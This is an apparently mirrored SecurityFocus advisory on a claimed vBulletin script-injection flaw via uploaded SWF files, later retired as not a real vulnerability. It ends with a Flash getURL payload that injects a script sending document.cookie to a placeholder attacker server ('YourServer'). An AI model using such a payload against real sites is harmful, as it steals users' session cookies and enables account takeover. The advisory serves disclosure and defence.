13 lines
No EOL
835 B
Text
13 lines
No EOL
835 B
Text
source: https://www.securityfocus.com/bid/21736/info
|
|
|
|
vBulletin is prone to a vulnerability that may let remote attackers inject arbitrary script code into the application.
|
|
|
|
If exploited, this vulnerability may let attackers steal cookie-based authentication credentials. Other attacks are also possible.
|
|
|
|
Update: Note that the ability to upload SWF files is disabled by default, and must be enabled by site administrators to expose this issue.
|
|
|
|
This BID is being retired because further information shows that the application is not vulnerable to this issue.
|
|
|
|
getURL("javascript:function blab(){}var scriptNode =
|
|
+document.createElement('script');document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='javascript';scriptNode.src='http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie
|
|
+;blab();"); |